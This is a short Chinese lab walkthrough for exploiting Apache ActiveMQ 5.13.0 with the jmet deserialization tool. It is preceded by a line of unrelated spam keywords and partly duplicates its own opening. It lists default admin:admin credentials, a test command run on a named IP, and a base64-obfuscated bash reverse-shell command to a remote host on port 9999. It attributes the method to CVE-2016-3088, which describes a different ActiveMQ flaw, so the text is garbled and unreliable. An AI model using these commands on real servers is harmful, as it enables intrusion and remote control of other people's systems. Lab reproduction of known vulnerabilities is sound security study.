给公司建网站 深圳,安卓应用开发系统,做标签这个网站刷单安全吗,四川建设厅网站首页CVE-2016-3088
一、环境搭建 Java:jdk8 影响版本 Apache ActiveMQ 5.13.0 二、用docker搭建漏洞环境 访问一下web界面 然后进入admin目录登录 账号:admin 密码:admin 三、工具准备 cd /opt wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0…CVE-2016-3088
一、环境搭建 Java:jdk8 影响版本 Apache ActiveMQ 5.13.0 二、用docker搭建漏洞环境 访问一下web界面 然后进入admin目录登录 账号:admin 密码:admin 三、工具准备 cd /opt wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar mkdir external 注意一定要下载external否则会报错
四、测试漏洞存在 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y touch /tmp/sucess -Yp ROME 8.210.152.234靶机IP下图说是自己的ip是错误的 61616 点击触发命令执行 查看一下目录发现创建成功 五、getshell
首先借用一个网站对payload进行处理网址我以前的文章复现有提到。 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvOTk5OSAwPiYxIA}|{base64,-d}|{bash,-i} 192.168.217.128 61616 最后点击它触发命令执行 如上图所示即反弹shell成功
